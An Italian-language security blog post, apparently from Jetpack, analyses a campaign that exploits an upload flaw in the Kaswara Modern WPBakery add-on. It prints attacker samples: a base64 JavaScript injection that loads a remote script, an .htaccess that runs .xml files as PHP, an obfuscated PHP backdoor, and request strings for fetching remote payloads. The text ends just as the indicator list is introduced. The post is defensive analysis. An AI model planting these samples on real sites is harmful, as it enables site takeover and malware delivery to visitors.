Plugin aggiuntivo Kaswara Modern WPBakery Page Builder vulnerabile sfruttato in natura

Il 20 aprile 2021, i nostri amici di WPScan hanno segnalato una grave vulnerabilità sui componenti aggiuntivi di Kaswara Modern VC, noti anche come componenti aggiuntivi di Kaswara Modern WPBakery Page Builder. Non è più disponibile su Codecanyon/Envato, il che significa che se lo hai in esecuzione, devi scegliere un'alternativa.

Questa vulnerabilità consente agli utenti non autenticati di caricare file arbitrari nella directory delle icone del plug-in (./wp-content/uploads/kaswara/icons). Questo è il primo Indicator Of Compromise (IOC) che i nostri amici di WPScan hanno condiviso con noi nel loro rapporto.

La possibilità di caricare file arbitrari su un sito Web offre al malintenzionato il pieno controllo sul sito, il che rende difficile definire il carico utile finale di questa infezione; quindi, ti mostreremo tutto ciò che abbiamo trovato finora (ci siamo lasciati un po' trasportare dalla ricerca, quindi sentiti libero di saltare alla sezione del CIO se non vuoi leggere fino in fondo).

Iniezione di database, app Android false e altre backdoor

Grazie al nostro amico Denis Siegubko di Sucuri per aver sottolineato il seguito dell'iniezione di database utilizzato con questo attacco.

I malintenzionati aggiornerebbero l'opzione "kaswara-customJS" per aggiungere uno snippet arbitrario dannoso di codice Javascript. Ecco un esempio che abbiamo trovato:

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

Questa stringa codificata in base64 si traduce in:

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

E come di solito accade con questo tipo di script, caricherà a catena una serie di altri frammenti di codice Javascript e il payload finale sarà un malvertising o un exploit kit. Questo è molto simile a quanto riportato da Wordfence qui.

In questo caso, lo script sta morendo su hxxp://double-clickd[.]com/ e non carica alcun contenuto dannoso. Ho trovato Javascript sospetto che chiama questo sito dall'inizio del 2020 e le persone lo hanno già bloccato dal 2018.

App false caricate sul sito

Le 40 app Android trovate sui siti Web che abbiamo esaminato erano versioni false di diverse app, come AliPay, PayPal, Correos, DHL e molte altre, che fortunatamente sono state rilevate dai fornitori di antivirus più popolari secondo questa analisi di VirusTotal.

Non ho verificato le intenzioni dell'app, ma una rapida revisione delle autorizzazioni richieste può darci un'idea di cosa potrebbe fare:

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• Android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• Android.permission.INTERNET
• Android.permission.SEND_SMS
• Android.permission.CALL_PHONE
• Android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

Tuttavia, questi file non vengono caricati immediatamente utilizzando l'exploit Kaswara. Dopo che il sito è stato compromesso, gli aggressori caricheranno prima altri strumenti per controllare completamente il sito.

File caricati

Alcune backdoor e altri malware sono stati trovati anche su siti Web compromessi da questa vulnerabilità. Condividerò una rapida analisi di quelli più popolari e interessanti in questo post. Tuttavia, voglio prima concentrarmi su quello più complesso.

Reindirizzamento e app false

Le App false che ho trovato su diversi siti compromessi non sono state caricate sfruttando la vulnerabilità di Kaswara. Vengono caricati sul sito utilizzando uno strumento di hacking multifunzione, che consente all'attaccante di caricare del codice remoto (fornendo un URL o una stringa) e reindirizzare l'utente a un sito dannoso.

Il file può essere facilmente identificato dalla presenza di questa stringa: base64_decode('MTIz');error_reporting(0); funzione

È interessante notare che randomizza tutto il resto tranne questo.

Il malware è su una singola riga, che è anche un IOC interessante se stai cercando questo tipo di anomalia del codice.

Per facilitare la comprensione, ho decodificato la maggior parte del codice, rinominato le funzioni interessanti e abbellito il codice. Il malware include 6 diverse funzioni e 5 di esse si basano sui valori passati alla variabile $_GET['ts'] . Per questo documento, consideriamo una delle tante istanze che ho trovato: c.php .

/c.php?ts=kt

Questo non fa nulla e forzerà il sito a restituire un errore 500 (più avanti nel codice).

/c.php?ts=1

Modifica il valore del flag $q1a in true per eseguire una convalida del codice e inviare un messaggio OK all'attaccante.

In questo caso il sito remoto risponde: {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php?ts=sv&v="Codice"&p=40bd001563085fc35165329ea1ff5c5ecbdbbeef

Scrive un file sul server con il codice fornito dal contenuto di $_GET["v"] purché $_GET["p"] sia il checksum SHA1 di 123 (ricordate che il primo IOC di base64_decode('MTIz') ? questo è quel checksum).

/c.php?ts=tt

Scrive 5 MB di "-" sul server, probabilmente utilizzato per verificare se la funzione di caricamento funzionerà sul server.

/c.php?ts=dwm&h=HASH1,HASH2

Quando il malware riceve questa richiesta, esegue un test per verificare se i file caricati sono stati scritti correttamente sul server. I loro hash MD5 devono essere conosciuti e vengono inviati alla variabile $_GET['h'] come valori separati da virgole.

/c.php?ts=dw&h=hash&l=URLs_as_CSV

Scarica un file da una serie di siti Web di terze parti e lo salva sul server nominandolo dopo gli ultimi 12 caratteri dell'md5 del file scaricato.

Questa è la funzione utilizzata per caricare app false sul server.

Ecco un esempio della richiesta di download di file dannosi /c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697

Reindirizzamento dell'accesso

Se è stata selezionata l'opzione kt o nessuna opzione, il codice procede al reindirizzamento, che si ottiene richiedendo un BLOB JSON con i dati necessari. Quindi procede a reindirizzare il visitatore utilizzando la funzione di intestazione.

La risposta è così: {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

La funzione per eseguire una richiesta cURL con i parametri necessari è questa: Niente di speciale...

E può essere tradotto in questa richiesta cURL:

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

L'URL finale è, per quanto ho potuto testare, casuale, ma condivide la stessa caratteristica di essere una pagina falsa per un servizio o un'app popolare.

wp-content/uploads/kaswara/icons/16/javas.xml e wp-content/uploads/kaswara/icons/16/.htaccess

Un file XML di solito non è contrassegnato come una potenziale minaccia, ma in questo caso abbiamo un file .htaccess appositamente predisposto che cambia il modo in cui lo vede il server web:

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

In effetti, dice ad Apache di interpretare qualsiasi file javas, home o menu con xml, php o pdf come un file PHP da elaborare di conseguenza ed eseguire. Quindi, uno qualsiasi di quei file presenti nella stessa struttura di directory di questo .htaccess sarà sospetto.

Il file javas.xml è lo stesso di altri file dannosi caricati sul sito. Ho scoperto che la differenza è che alcuni hanno una o due righe vuote alla fine del file, il che rende l'hashing tradizionale un po' più complicato.

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

Il codice dannoso viene offuscato utilizzando stringhe codificate str_rot13 e base64. Utilizza anche valori esadecimali e operazioni matematiche per nascondere un po' di più le stringhe. Il payload finale è sconosciuto poiché creerà una funzione basata sui valori di una richiesta POST. Tuttavia, il carico utile sembra essere lo stesso ogni volta poiché si basa su un controllo md5 prima di crearlo (c42ea979ed982c02632430e9e98a66d6 è l'hash md5).

Conclusione

Poiché si tratta di una campagna attiva, al momento della stesura di questo post stiamo riscontrando sempre più diversi esempi di malware rilasciati nei siti interessati. Alcuni sono solo variazioni di ciò che abbiamo qui, mentre altri sono abbastanza interessanti per un'analisi più approfondita. Cerca alcuni post più piccoli in arrivo per esplorare alcuni di questi altri esempi.

Ciò illustra l'importanza di aggiornare le estensioni con le ultime correzioni di sicurezza; se gli sviluppatori non rilasciano le correzioni in modo tempestivo o viene rimosso dal repository di WordPress.org (o da altri mercati), ti consigliamo vivamente di trovare un'alternativa più sicura.

Se sei preoccupato per il malware e la vulnerabilità del tuo sito, dai un'occhiata alle funzionalità di sicurezza di Jetpack. Jetpack Security offre una sicurezza del sito WordPress completa e facile da usare, inclusi backup, scansione malware e protezione antispam.

Indicatori di compromesso

Qui trovi l'elenco completo di tutti i CIO che abbiamo identificato: